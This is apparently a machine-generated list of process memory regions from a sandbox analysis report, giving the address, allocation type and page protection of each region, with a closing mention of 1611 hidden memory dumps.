25E70000
trusted library allocation
page read and write
7347000
heap
page read and write
F9957CB000
stack
page read and write
2556D000
stack
page read and write
25C8E000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BDB37000
trusted library allocation
page read and write
24CCF2E9000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
2568D000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
494D000
stack
page read and write
75E0000
direct allocation
page read and write
7347000
heap
page read and write
24CD0FB3000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
48E0000
direct allocation
page read and write
7347000
heap
page read and write
24CCF2E9000
heap
page read and write
24CD1068000
heap
page read and write
250BA1F0000
heap
page read and write
7347000
heap
page read and write
7630000
direct allocation
page read and write
72D0000
trusted library allocation
page read and write
24CD1789000
heap
page read and write
7259000
heap
page read and write
22FE9000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
743A000
heap
page read and write
251A5000
heap
page read and write
25CF0000
trusted library allocation
page read and write
2294E000
stack
page read and write
7347000
heap
page read and write
24CCF25E000
heap
page read and write
250BDBAA000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25D00000
trusted library allocation
page read and write
24CCF309000
heap
page read and write
22D30000
trusted library allocation
page read and write
7FFB4B470000
trusted library allocation
page read and write
25C90000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24FD0000
trusted library allocation
page read and write
7347000
heap
page read and write
C12D18D000
stack
page read and write
F994C7E000
stack
page read and write
25670000
trusted library allocation
page read and write
4400000
remote allocation
page execute and read and write
25690000
trusted library allocation
page read and write
24F60000
trusted library allocation
page read and write
2546D000
stack
page read and write
7FFB4B2C0000
trusted library allocation
page read and write
8D10000
direct allocation
page execute and read and write
22F0B000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
98B0000
direct allocation
page execute and read and write
2516D000
heap
page read and write
7347000
heap
page read and write
24CD0F24000
heap
page read and write
24CD1065000
heap
page read and write
7EE0000
heap
page read and write
24CD11EE000
heap
page read and write
2DE0000
trusted library allocation
page read and write
24CD0FE3000
heap
page read and write
2B7D05E0000
heap
page read and write
7347000
heap
page read and write
24CCF130000
heap
page read and write
582E2FF000
stack
page read and write
25CA0000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
24CD1022000
heap
page read and write
ACB0000
direct allocation
page execute and read and write
7347000
heap
page read and write
24CD0FC7000
heap
page read and write
24CD0F3F000
heap
page read and write
48A0000
direct allocation
page read and write
6E60000
heap
page read and write
7347000
heap
page read and write
24CD119D000
heap
page read and write
483D000
stack
page read and write
7FFB4B370000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD10BD000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD0FE8000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BA3A0000
heap
page readonly
7347000
heap
page read and write
25CA0000
trusted library allocation
page read and write
7347000
heap
page read and write
24FD0000
trusted library allocation
page read and write
2C4E000
stack
page read and write
25D00000
trusted library allocation
page read and write
7347000
heap
page read and write
4A8B000
stack
page read and write
24CD122C000
heap
page read and write
251AF000
heap
page read and write
25CF0000
trusted library allocation
page read and write
24CD10DD000
heap
page read and write
73DE000
stack
page read and write
7FFB4B240000
trusted library allocation
page execute and read and write
25690000
trusted library allocation
page read and write
7347000
heap
page read and write
251A3000
heap
page read and write
22FAD000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
22F1A000
trusted library allocation
page read and write
25690000
trusted library allocation
page read and write
24CD104A000
heap
page read and write
7FFB4B3C0000
trusted library allocation
page read and write
24CD0FA3000
heap
page read and write
250BD617000
trusted library allocation
page read and write
24FB0000
heap
page read and write
25670000
trusted library allocation
page read and write
24CCF249000
heap
page read and write
7347000
heap
page read and write
7FBE000
stack
page read and write
23F89000
trusted library allocation
page read and write
25CB0000
trusted library allocation
page read and write
25690000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD0EF1000
heap
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
2D00000
heap
page read and write
250CBD81000
trusted library allocation
page read and write
7347000
heap
page read and write
250D4269000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BA330000
heap
page read and write
250D41F0000
heap
page read and write
24CCF180000
heap
page read and write
24CD0FFC000
heap
page read and write
7347000
heap
page read and write
24CD1340000
heap
page read and write
25690000
trusted library allocation
page read and write
24CD1741000
heap
page read and write
7670000
direct allocation
page read and write
7347000
heap
page read and write
25CA0000
trusted library allocation
page read and write
7347000
heap
page read and write
F9945FE000
stack
page read and write
7347000
heap
page read and write
24CD0FEE000
heap
page read and write
25CA0000
trusted library allocation
page read and write
7347000
heap
page read and write
7FD0000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1752000
heap
page read and write
7437000
heap
page read and write
250BBBC0000
trusted library allocation
page read and write
22C2E000
stack
page read and write
2E00000
trusted library allocation
page execute and read and write
25674000
trusted library allocation
page read and write
F9949F9000
stack
page read and write
2B7D0730000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD0F2F000
heap
page read and write
7347000
heap
page read and write
24CD1112000
heap
page read and write
24CD10BF000
heap
page read and write
7347000
heap
page read and write
25670000
trusted library allocation
page read and write
7347000
heap
page read and write
73D0000
heap
page read and write
24CCF188000
heap
page read and write
7347000
heap
page read and write
25D00000
trusted library allocation
page read and write
22F95000
trusted library allocation
page read and write
24CD0FC4000
heap
page read and write
25680000
trusted library allocation
page read and write
22F06000
trusted library allocation
page read and write
7180000
heap
page read and write
24CD0FA0000
heap
page read and write
25690000
trusted library allocation
page read and write
7347000
heap
page read and write
25670000
trusted library allocation
page read and write
7F10000
trusted library allocation
page read and write
85A0000
direct allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
22BF0000
remote allocation
page read and write
2298D000
stack
page read and write
2B9E000
stack
page read and write
7347000
heap
page read and write
2B20000
trusted library section
page read and write
2DD2000
trusted library allocation
page read and write
25680000
trusted library allocation
page read and write
25156000
heap
page read and write
250BA1C2000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25670000
trusted library allocation
page read and write
81EE000
stack
page read and write
24CCF050000
heap
page read and write
582E5FB000
stack
page read and write
72C0000
trusted library allocation
page read and write
7347000
heap
page read and write
25CF0000
trusted library allocation
page read and write
7347000
heap
page read and write
251F1000
heap
page read and write
7347000
heap
page read and write
25670000
trusted library allocation
page read and write
8238000
heap
page read and write
250BC250000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD0F21000
heap
page read and write
25CAE000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1056000
heap
page read and write
7347000
heap
page read and write
2A3E000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BA141000
heap
page read and write
7347000
heap
page read and write
24CCF150000
heap
page read and write
7FFB4B490000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7FFB4B3B0000
trusted library allocation
page read and write
250BC5CA000
trusted library allocation
page read and write
24CD1037000
heap
page read and write
7347000
heap
page read and write
25111000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD10DD000
heap
page read and write
24CD0EF1000
heap
page read and write
7347000
heap
page read and write
85C0000
direct allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
22D9E000
stack
page read and write
250BA137000
heap
page read and write
523C000
trusted library allocation
page read and write
72EA000
trusted library allocation
page read and write
7FFB4B380000
trusted library allocation
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
F9944FE000
stack
page read and write
22DE8000
trusted library allocation
page read and write
7378000
heap
page read and write
7FFB4B120000
trusted library allocation
page read and write
25690000
trusted library allocation
page read and write
8250000
heap
page read and write
24CD175D000
heap
page read and write
250BA157000
heap
page read and write
250D43DD000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1414000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
25159000
heap
page read and write
250BDB4E000
trusted library allocation
page read and write
25CF0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
2B00000
heap
page read and write
7347000
heap
page read and write
741D000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD10E1000
heap
page read and write
25147000
heap
page read and write
24CD10F9000
heap
page read and write
7347000
heap
page read and write
25CA0000
trusted library allocation
page read and write
7F00000
trusted library allocation
page read and write
24CD0F37000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
82B1000
heap
page read and write
4890000
direct allocation
page read and write
24CD105D000
heap
page read and write
250BD61A000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD0FEE000
heap
page read and write
7347000
heap
page read and write
25101000
heap
page read and write
250BC1EC000
trusted library allocation
page read and write
24CD0F30000
heap
page read and write
7347000
heap
page read and write
24CD0FF0000
heap
page read and write
25CB0000
trusted library allocation
page read and write
7FFB4B13B000
trusted library allocation
page read and write
7DF4E3C60000
trusted library allocation
page execute and read and write
25690000
trusted library allocation
page read and write
4A4D000
stack
page read and write
2512B000
heap
page read and write
726B000
heap
page read and write
24CD0EF3000
heap
page read and write
7347000
heap
page read and write
24CD0F09000
heap
page read and write
250BA3D0000
heap
page read and write
24CD1414000
heap
page read and write
24CD0FEE000
heap
page read and write
22F40000
trusted library allocation
page read and write
24F70000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7FFB4B2F0000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
33A0000
heap
page read and write
7347000
heap
page read and write
250BC1DA000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250D4409000
heap
page read and write
24CCF309000
heap
page read and write
25CA0000
trusted library allocation
page read and write
2B92000
trusted library allocation
page read and write
7347000
heap
page read and write
72E0000
trusted library allocation
page read and write
24CCF18B000
heap
page read and write
250BC1E8000
trusted library allocation
page read and write
24CD12F9000
heap
page read and write
250BDB28000
trusted library allocation
page read and write
822C000
stack
page read and write
25CA0000
trusted library allocation
page read and write
2B7D0500000
heap
page read and write
24CD1741000
heap
page read and write
582E9FB000
stack
page read and write
25690000
trusted library allocation
page read and write
250BC411000
trusted library allocation
page read and write
5254000
trusted library allocation
page read and write
24CD0FDB000
heap
page read and write
24CD174D000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25690000
trusted library allocation
page read and write
24CD0F67000
heap
page read and write
24CD0FEE000
heap
page read and write
7347000
heap
page read and write
73E2000
heap
page read and write
24CD0F19000
heap
page read and write
25690000
trusted library allocation
page read and write
7347000
heap
page read and write
8060000
heap
page read and write
250BC58D000
trusted library allocation
page read and write
24FB0000
trusted library allocation
page read and write
25CD0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
73E2000
heap
page read and write
2552E000
stack
page read and write
229CC000
stack
page read and write
24CD10CB000
heap
page read and write
2BA0000
heap
page read and write
7347000
heap
page read and write
254AE000
stack
page read and write
7347000
heap
page read and write
2EAF000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25C90000
trusted library allocation
page read and write
7347000
heap
page read and write
250D43D0000
heap
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
22A4E000
stack
page read and write
7500000
trusted library allocation
page read and write
7347000
heap
page read and write
251F1000
heap
page read and write
7347000
heap
page read and write
2B90000
trusted library allocation
page read and write
F9956CE000
stack
page read and write
2BFE000
unkown
page read and write
7347000
heap
page read and write
24CD0FBB000
heap
page read and write
7347000
heap
page read and write
25670000
trusted library allocation
page read and write
250BBBF0000
trusted library allocation
page read and write
2567D000
trusted library allocation
page read and write
2290E000
stack
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
76D0000
heap
page read and write
250BDBBD000
trusted library allocation
page read and write
25CF0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
2FCC000
heap
page read and write
487B000
stack
page read and write
7347000
heap
page read and write
25CE0000
trusted library allocation
page read and write
There are 1611 hidden memdumps, click here to show them.